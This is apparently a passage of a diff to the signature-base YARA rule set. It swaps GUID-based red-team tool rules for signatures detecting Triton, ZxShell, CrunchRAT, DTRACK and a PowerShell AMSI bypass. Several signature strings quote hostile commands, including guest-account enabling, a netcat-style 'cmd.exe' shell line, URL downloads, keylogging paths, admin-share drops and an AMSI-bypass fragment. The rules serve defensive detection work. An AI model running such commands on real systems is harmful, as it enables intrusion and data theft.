-		modified = "2023-04-06"
-		reference = "https://github.com/r3nhat/XORedReflectiveDLL"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1700-L1716"
+		description = "Detects Triton APT malware - file trilog.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ae2c9b47-2a67-50c6-9d2a-dc47b4fa69ef"
+		date = "2017-12-14"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/vtQoCQ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_triton.yar#L70-L85"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8df590cacf5922fcc9d059b34b88774b1afeb78b0fcffe3cc2d8578d20baf0a0"
+		logic_hash = "6406e9e7651978a6817079945dc801afdb6c16dd107527cbfd9a946eca27a51a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e8542c07b2af63ee7e72ce5d97d91036c5da56e2b091aa2afe737b224305d230"
 
 	strings:
-		$typelibguid0lo = "c0e49392-04e3-4abb-b931-5202e0eb4c73" ascii wide
-		$typelibguid0up = "C0E49392-04E3-4ABB-B931-5202E0EB4C73" ascii wide
-		$typelibguid1lo = "30eef7d6-cee8-490b-829f-082041bc3141" ascii wide
-		$typelibguid1up = "30EEF7D6-CEE8-490B-829F-082041BC3141" ascii wide
+		$s1 = "inject.bin" ascii
+		$s2 = "PYTHON27.DLL" fullword ascii
+		$s3 = "payload" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharp_Suite : FILE
+rule SIGNATURE_BASE_Zxshell_Related_Malware_CN_Group_Jul17_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "ab3cf358-a41d-584d-baaf-5e8f7232ca85"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/FuzzySecurity/Sharp-Suite"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1718-L1773"
+		description = "Detects a ZxShell related sample from a CN threat group"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a91e39bb-1bb3-54a8-b684-d673c445375c"
+		date = "2017-07-08"
+		modified = "2023-12-05"
+		reference = "https://blogs.rsa.com/cat-phishing/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_zxshell.yar#L12-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d71931b45525607ed0f442a925540dba3663aeae9b5e1fa8380ffe0ce2b5f5eb"
+		logic_hash = "30195ff91bd62e32784040f9ec2cf72db90ef1c75056abfd9740f35ce1baccd9"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ef56c2609bc1b90f3e04745890235e6052a4be94e35e38b6f69b64fb17a7064e"
 
 	strings:
-		$typelibguid0lo = "19657be4-51ca-4a85-8ab1-f6666008b1f3" ascii wide
-		$typelibguid0up = "19657BE4-51CA-4A85-8AB1-F6666008B1F3" ascii wide
-		$typelibguid1lo = "0a382d9a-897f-431a-81c2-a4e08392c587" ascii wide
-		$typelibguid1up = "0A382D9A-897F-431A-81C2-A4E08392C587" ascii wide
-		$typelibguid2lo = "467ee2a9-2f01-4a71-9647-2a2d9c31e608" ascii wide
-		$typelibguid2up = "467EE2A9-2F01-4A71-9647-2A2D9C31E608" ascii wide
-		$typelibguid3lo = "eacaa2b8-43e5-4888-826d-2f6902e16546" ascii wide
-		$typelibguid3up = "EACAA2B8-43E5-4888-826D-2F6902E16546" ascii wide
-		$typelibguid4lo = "629f86e6-44fe-4c9c-b043-1c9b64be6d5a" ascii wide
-		$typelibguid4up = "629F86E6-44FE-4C9C-B043-1C9B64BE6D5A" ascii wide
-		$typelibguid5lo = "ecf2ffe4-1744-4745-8693-5790d66bb1b8" ascii wide
-		$typelibguid5up = "ECF2FFE4-1744-4745-8693-5790D66BB1B8" ascii wide
-		$typelibguid6lo = "0a621f4c-8082-4c30-b131-ba2c98db0533" ascii wide
-		$typelibguid6up = "0A621F4C-8082-4C30-B131-BA2C98DB0533" ascii wide
-		$typelibguid7lo = "72019dfe-608e-4ab2-a8f1-66c95c425620" ascii wide
-		$typelibguid7up = "72019DFE-608E-4AB2-A8F1-66C95C425620" ascii wide
-		$typelibguid8lo = "f0d28809-b712-4380-9a59-407b7b2badd5" ascii wide
-		$typelibguid8up = "F0D28809-B712-4380-9A59-407B7B2BADD5" ascii wide
-		$typelibguid9lo = "956a5a4d-2007-4857-9259-51cd0fb5312a" ascii wide
-		$typelibguid9up = "956A5A4D-2007-4857-9259-51CD0FB5312A" ascii wide
-		$typelibguid10lo = "a3b7c697-4bb6-455d-9fda-4ab54ae4c8d2" ascii wide
-		$typelibguid10up = "A3B7C697-4BB6-455D-9FDA-4AB54AE4C8D2" ascii wide
-		$typelibguid11lo = "a5f883ce-1f96-4456-bb35-40229191420c" ascii wide
-		$typelibguid11up = "A5F883CE-1F96-4456-BB35-40229191420C" ascii wide
-		$typelibguid12lo = "28978103-d90d-4618-b22e-222727f40313" ascii wide
-		$typelibguid12up = "28978103-D90D-4618-B22E-222727F40313" ascii wide
-		$typelibguid13lo = "0c70c839-9565-4881-8ea1-408c1ebe38ce" ascii wide
-		$typelibguid13up = "0C70C839-9565-4881-8EA1-408C1EBE38CE" ascii wide
-		$typelibguid14lo = "fa1d9a36-415a-4855-8c01-54b6e9fc6965" ascii wide
-		$typelibguid14up = "FA1D9A36-415A-4855-8C01-54B6E9FC6965" ascii wide
-		$typelibguid15lo = "252676f8-8a19-4664-bfb8-5a947e48c32a" ascii wide
-		$typelibguid15up = "252676F8-8A19-4664-BFB8-5A947E48C32A" ascii wide
-		$typelibguid16lo = "447edefc-b429-42bc-b3bc-63a9af19dbd6" ascii wide
-		$typelibguid16up = "447EDEFC-B429-42BC-B3BC-63A9AF19DBD6" ascii wide
-		$typelibguid17lo = "04d0b3a6-eaab-413d-b9e2-512fa8ebd02f" ascii wide
-		$typelibguid17up = "04D0B3A6-EAAB-413D-B9E2-512FA8EBD02F" ascii wide
-		$typelibguid18lo = "5611236e-2557-45b8-be29-5d1f074d199e" ascii wide
-		$typelibguid18up = "5611236E-2557-45B8-BE29-5D1F074D199E" ascii wide
-		$typelibguid19lo = "53f622eb-0ca3-4e9b-9dc8-30c832df1c7b" ascii wide
-		$typelibguid19up = "53F622EB-0CA3-4E9B-9DC8-30C832DF1C7B" ascii wide
-		$typelibguid20lo = "414187db-5feb-43e5-a383-caa48b5395f1" ascii wide
-		$typelibguid20up = "414187DB-5FEB-43E5-A383-CAA48B5395F1" ascii wide
+		$x1 = "CMD.EXE /C NET USER GUEST /ACTIVE:yes && NET USER GUEST ++++++" ascii
+		$x2 = "system\\cURRENTcONTROLSET\\sERVICES\\tERMSERVICE" fullword ascii
+		$x3 = "\\secivreS\\teSlortnoCtnerruC\\METSYS" ascii
+		$x4 = "system\\cURRENTCONTROLSET\\cONTROL\\tERMINAL sERVER" fullword ascii
+		$x5 = "sOFTWARE\\mICROSOFT\\iNTERNET eXPLORER\\mAIN" fullword ascii
+		$x6 = "eNABLEaDMINtsREMOTE" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Rat_Shell : FILE
+rule SIGNATURE_BASE_Zxshell_Related_Malware_CN_Group_Jul17_2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "8f206175-f7e4-5543-8059-24f102fcd4b9"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/stphivos/rat-shell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1775-L1791"
+		description = "Detects a ZxShell related sample from a CN threat group"
+		author = "Florian Roth (Nextron Systems)"
+		id = "37c1f26b-4b4f-510e-a7b7-b2afb17d6e71"
+		date = "2017-07-08"
+		modified = "2023-12-05"
+		reference = "https://blogs.rsa.com/cat-phishing/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_zxshell.yar#L32-L58"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2383483678c2a4b2545484c28aa81c2933c75a6bfb24dcfd6c989be90a2aca76"
+		logic_hash = "d7c9f2af3842d60cf4b0b64bdb687a32014b449b42b101394e0424c12fc2808e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "204273675526649b7243ee48efbb7e2bc05239f7f9015fbc4fb65f0ada64759e"
 
 	strings:
-		$typelibguid0lo = "7a15f8f6-6ce2-4ca4-919d-2056b70cc76a" ascii wide
-		$typelibguid0up = "7A15F8F6-6CE2-4CA4-919D-2056B70CC76A" ascii wide
-		$typelibguid1lo = "1659d65d-93a8-4bae-97d5-66d738fc6f6c" ascii wide
-		$typelibguid1up = "1659D65D-93A8-4BAE-97D5-66D738FC6F6C" ascii wide
+		$u1 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)" fullword ascii
+		$u2 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)" fullword ascii
+		$u3 = "User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0" fullword ascii
+		$u4 = "User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword ascii
+		$x1 = "\\\\%s\\admin$\\g1fd.exe" fullword ascii
+		$x2 = "C:\\g1fd.exe" fullword ascii
+		$x3 = "\\\\%s\\C$\\NewArean.exe" fullword ascii
+		$s0 = "at \\\\%s %d:%d %s" fullword ascii
+		$s1 = "%c%c%c%c%ccn.exe" fullword ascii
+		$s2 = "hra%u.dll" fullword ascii
+		$s3 = "Referer: http://%s:80/http://%s" fullword ascii
+		$s5 = "Accept-Language: zh-cn" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Dotnet_Gargoyle : FILE
+rule SIGNATURE_BASE_Zxshell_Related_Malware_CN_Group_Jul17_3 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5efd0c83-cb65-5bda-b55e-4a89db5f337c"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/countercept/dotnet-gargoyle"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1793-L1811"
+		description = "Detects a ZxShell related sample from a CN threat group"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1900b861-b4a2-50b5-a639-3eb442072139"
+		date = "2017-07-08"
+		modified = "2023-12-05"
+		reference = "https://blogs.rsa.com/cat-phishing/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_zxshell.yar#L60-L74"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "29147b4e14f45757274ca1bc0d140323a908d663f580b00cc705bd9cf3072f56"
+		logic_hash = "1d7dd59cf6ef24ce47431f9f3fbc980019880082b4e6162bae70b64abaa26db7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2e5cf8c785dc081e5c2b43a4a785713c0ae032c5f86ccbc7abf5c109b8854ed7"
 
 	strings:
-		$typelibguid0lo = "76435f79-f8af-4d74-8df5-d598a551b895" ascii wide
-		$typelibguid0up = "76435F79-F8AF-4D74-8DF5-D598A551B895" ascii wide
-		$typelibguid1lo = "5a3fc840-5432-4925-b5bc-abc536429cb5" ascii wide
-		$typelibguid1up = "5A3FC840-5432-4925-B5BC-ABC536429CB5" ascii wide
-		$typelibguid2lo = "6f0bbb2a-e200-4d76-b8fa-f93c801ac220" ascii wide
-		$typelibguid2up = "6F0BBB2A-E200-4D76-B8FA-F93C801AC220" ascii wide
+		$s1 = "%s\\nt%s.dll" fullword ascii
+		$s2 = "RegQueryValueEx(Svchost\\netsvcs)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Aresskit : FILE
+rule SIGNATURE_BASE_Zxshell_Jul17 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "8265cd84-c8e7-5654-9d3a-774dab52d938"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/BlackVikingPro/aresskit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1813-L1827"
+		description = "Detects a ZxShell - CN threat group"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1b009b20-5a19-5cac-aaaf-ca61310eab9f"
+		date = "2017-07-08"
+		modified = "2023-12-05"
+		reference = "https://blogs.rsa.com/cat-phishing/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_zxshell.yar#L76-L101"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d0a1c7000c4018ba3c7405e310cfddea8795745216467dfb79379af521889cc6"
+		logic_hash = "2c7467417ffc8b0ed3037ace9ce4183c9d4a90d1c087a420dd3c7a9c422621b1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16"
 
 	strings:
-		$typelibguid0lo = "8dca0e42-f767-411d-9704-ae0ba4a44ae8" ascii wide
-		$typelibguid0up = "8DCA0E42-F767-411D-9704-AE0BA4A44AE8" ascii wide
+		$x1 = "zxplug -add" fullword ascii
+		$x2 = "getxxx c:\\xyz.dll" fullword ascii
+		$x3 = "downfile -d c:\\windows\\update.exe" fullword ascii
+		$x4 = "-fromurl http://x.x.x/x.dll" fullword ascii
+		$x5 = "ping 127.0.0.1 -n 7&cmd.exe /c net start %s" fullword ascii
+		$x6 = "ZXNC -e cmd.exe x.x.x.x" fullword ascii
+		$x7 = "(bind a cmdshell)" fullword ascii
+		$x8 = "ZXFtpServer 21 20 zx" fullword ascii
+		$x9 = "ZXHttpServer" fullword ascii
+		$x10 = "c:\\error.htm,.exe|c:\\a.exe,.zip|c:\\b.zip\"" fullword ascii
+		$x11 = "c:\\windows\\clipboardlog.txt" fullword ascii
+		$x12 = "AntiSniff -a wireshark.exe" fullword ascii
+		$x13 = "c:\\windows\\keylog.txt" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( filesize < 10000KB and 1 of them ) or 3 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_DLL_Injector : FILE
+
+rule SIGNATURE_BASE_Zxshell_20171211_Chrsben : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "301e70f4-89ed-539c-b7f3-9fc6ae1393b3"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/tmthrgd/DLL-Injector"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1829-L1845"
+		description = "Detects ZxShell variant surfaced in Dec 17"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3bbfddb8-011a-52dd-b0c8-b35e6f740507"
+		date = "2017-12-11"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/snc85M"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_zxshell.yar#L115-L138"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "45f63db2fbb807ecab8ebc91bc3ba781f145c60d8e84afd7ea07c57d5aa7bb41"
+		logic_hash = "361441404582b0eaca25954f7fe1a3a3b9fefd15cac78d61408bc50aeb78bb61"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "dd01e7a1c9b20d36ea2d961737780f2c0d56005c370e50247e38c5ca80dcaa4f"
 
 	strings:
-		$typelibguid0lo = "4581a449-7d20-4c59-8da2-7fd830f1fd5e" ascii wide
-		$typelibguid0up = "4581A449-7D20-4C59-8DA2-7FD830F1FD5E" ascii wide
-		$typelibguid1lo = "05f4b238-25ce-40dc-a890-d5bbb8642ee4" ascii wide
-		$typelibguid1up = "05F4B238-25CE-40DC-A890-D5BBB8642EE4" ascii wide
+		$x1 = "ncProxyXll" fullword ascii
+		$s1 = "Uniscribe.dll" fullword ascii
+		$s2 = "GetModuleFileNameDll" fullword ascii
+		$s4 = "$Hangzhou Shunwang Technology Co.,Ltd0" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( pe.imphash ( ) == "de481441d675e9aca4f20bd8e16a5faa" or pe.exports ( "PerfectWorld" ) or pe.exports ( "ncProxyXll" ) or 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Trufflesnout : FILE
+rule SIGNATURE_BASE_Crunchrat : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "8135d39e-6a9e-567d-840f-8d8c6338cce1"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/dsnezhkov/TruffleSnout"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1847-L1861"
+		description = "Detects CrunchRAT - file CrunchRAT.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "da7d9b5c-6ccc-5960-9daa-4df612545751"
+		date = "2017-11-03"
+		modified = "2023-12-05"
+		reference = "https://github.com/t3ntman/CrunchRAT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_crunchrat.yar#L2-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5c3a69776d1c1f2503b85e410eef83067e178c22e08dcefdecbe73040bf1d737"
+		logic_hash = "e29cfe6dd2ca69b1a8cd0cb36f7513dd9befd392906225196991dc62fcc80870"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "58a07e96497745b6fd5075d569f17b0254c3e50b0234744e0487f7c5dddf7161"
 
 	strings:
-		$typelibguid0lo = "33842d77-bce3-4ee8-9ee2-9769898bb429" ascii wide
-		$typelibguid0up = "33842D77-BCE3-4EE8-9EE2-9769898BB429" ascii wide
+		$x1 = "----CrunchRAT" fullword wide
+		$x2 = "\\Debug\\CrunchRAT" ascii
+		$x3 = "\\Release\\CrunchRAT" ascii
+		$s1 = "runCommand" fullword ascii
+		$s2 = "<action>download<action>" fullword wide
+		$s3 = "Content-Disposition: form-data; name=action" fullword wide
+		$s4 = "<action>upload<action>" fullword wide
+		$s5 = "/update.php" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 40KB and ( 1 of ( $x* ) and 3 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Anti_Analysis : FILE
+rule SIGNATURE_BASE_APT_MAL_DTRACK_Oct19_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "bd527841-065e-57e9-b70e-c9d232072f1b"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/NYAN-x-CAT/Anti-Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1863-L1877"
+		description = "Detects DTRACK malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "802135bd-234d-574d-b111-fcc9eaa000f8"
+		date = "2019-10-28"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/a_tweeter_user/status/1188811977851887616?s=21"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dtrack.yar#L2-L44"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "60d7b68aabc6819c8bbc3adfa069f624df4ba3fecd7548841a8cd2f4415fd1a7"
+		logic_hash = "b99bc8ec4df7185da306365dc2a24a0849ff0d5d92269daaa1efbb20f5e5bf83"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c5c1ca4382f397481174914b1931e851a9c61f029e6b3eb8a65c9e92ddf7aa4c"
+		hash2 = "a0664ac662802905329ec6ab3b3ae843f191e6555b707f305f8f5a0599ca3f68"
+		hash3 = "93a01fbbdd63943c151679d037d32b1d82a55d66c6cb93c40ff63f2b770e5ca9"
+		hash4 = "3cc9d9a12f3b884582e5c4daf7d83c4a510172a836de90b87439388e3cde3682"
+		hash5 = "bfb39f486372a509f307cde3361795a2f9f759cbeb4cac07562dcbaebc070364"
+		hash6 = "58fef66f346fe3ed320e22640ab997055e54c8704fc272392d71e367e2d1c2bb"
+		hash7 = "9d9571b93218f9a635cfeb67b3b31e211be062fd0593c0756eb06a1f58e187fd"
 
 	strings:
-		$typelibguid0lo = "3092c8df-e9e4-4b75-b78e-f81a0058a635" ascii wide
-		$typelibguid0up = "3092C8DF-E9E4-4B75-B78E-F81A0058A635" ascii wide
+		$xc1 = { 25 73 2A 2E 2A 00 00 00 5C 00 00 00 25 73 7E 00
+               5C 00 00 00 77 62 00 00 64 61 74 00 64 6B 77 65
+               72 6F 33 38 6F 65 72 41 5E 74 40 23 00 00 00 00
+               63 3A 5C 00 25 73 5C 25 63 2E 74 6D 70 }
+		$sx1 = "%02d.%02d.%04d - %02d:%02d:%02d:%03d : " fullword ascii
+		$sx2 = "%s\\%c.tmp" fullword ascii
+		$sx3 = "dkwero38oerA" fullword ascii
+		$sx4 = "awz2qr21yfbj" fullword ascii
+		$s1 = "Execute_%s.log" ascii
+		$s2 = "%s\\%s\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" fullword ascii
+		$s3 = "CCS_Mozilla/5.0" fullword ascii
+		$s4 = "\\C$\\Windows\\Temp\\MpLogs\\" ascii
+		$s5 = "127.0.0.1 >NUL & echo EEEE > \"%s\"" fullword ascii
+		$s6 = "[+] DownloadCommand" fullword ascii
+		$s7 = "DC-Error: Too long cmd length" fullword ascii
+		$s8 = "%s\\~%d.tmp" fullword ascii
+		$s9 = "%02X:%02X:%02X:%02X:%02X:%02X" ascii fullword
+		$op1 = { 0f b6 8d a3 fc ff ff 85 c9 74 09 8b 55 f4 83 c2 }
+		$op2 = { 6a 00 8d 85 28 fc ff ff 50 6a 04 8d 4d f8 51 8b }
+		$op3 = { 8b 85 c8 fd ff ff 03 85 a4 fc ff ff 89 85 b4 fc }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		$xc1 or 2 of ( $sx* ) or 4 of them or ( uint16( 0 ) == 0x5a4d and filesize <= 3000KB and 2 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Backnet : FILE
+rule SIGNATURE_BASE_PS_AMSI_Bypass : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "91824d18-f46b-5b95-b650-4d710d711cf9"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/valsov/BackNet"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1879-L1899"
+		description = "Detects PowerShell AMSI Bypass"
+		author = "Florian Roth (Nextron Systems)"
+		id = "31ab8932-4c74-5251-a044-3fcc0aa159f4"
+		date = "2017-07-19"
+		modified = "2023-12-05"
+		reference = "https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_scripts.yar#L4-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f1814ad6f6f96f9a9efc6d684c4e19203d84b191c0eef801c18f5b67787892bb"
-		score = 75
+		logic_hash = "87188c6cbb7d89c25faafb297a7c0e52321c661c84cdefd5604785c687190fcd"
+		score = 65
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "9fdae122-cd1e-467d-a6fa-a98c26e76348" ascii wide
-		$typelibguid0up = "9FDAE122-CD1E-467D-A6FA-A98C26E76348" ascii wide
-		$typelibguid1lo = "243c279e-33a6-46a1-beab-2864cc7a499f" ascii wide
-		$typelibguid1up = "243C279E-33A6-46A1-BEAB-2864CC7A499F" ascii wide
-		$typelibguid2lo = "a7301384-7354-47fd-a4c5-65b74e0bbb46" ascii wide
-		$typelibguid2up = "A7301384-7354-47FD-A4C5-65B74E0BBB46" ascii wide
-		$typelibguid3lo = "982dc5b6-1123-428a-83dd-d212490c859f" ascii wide
-		$typelibguid3up = "982DC5B6-1123-428A-83DD-D212490C859F" ascii wide
+		$s1 = ".GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static')." ascii nocase
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Allthethings : FILE
+rule SIGNATURE_BASE_JS_Suspicious_Obfuscation_Dropbox
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "c35160cb-ad31-5195-a7c6-0af91a58737d"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/johnjohnsp1/AllTheThings"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1901-L1915"
+		description = "Detects PowerShell AMSI Bypass"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9b6b288d-3a15-5267-bbb1-885febf4df78"
+		date = "2017-07-19"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/ItsReallyNick/status/887705105239343104"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_scripts.yar#L19-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "09836251d75327ef547451024ffed76de8cf41ce027fbf40db0cac44f74d46d5"
-		score = 75
+		logic_hash = "19d1dd25c4a5e18dca131709a64c3537278754ec9d67b0bb49bde9b1493d3dc7"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
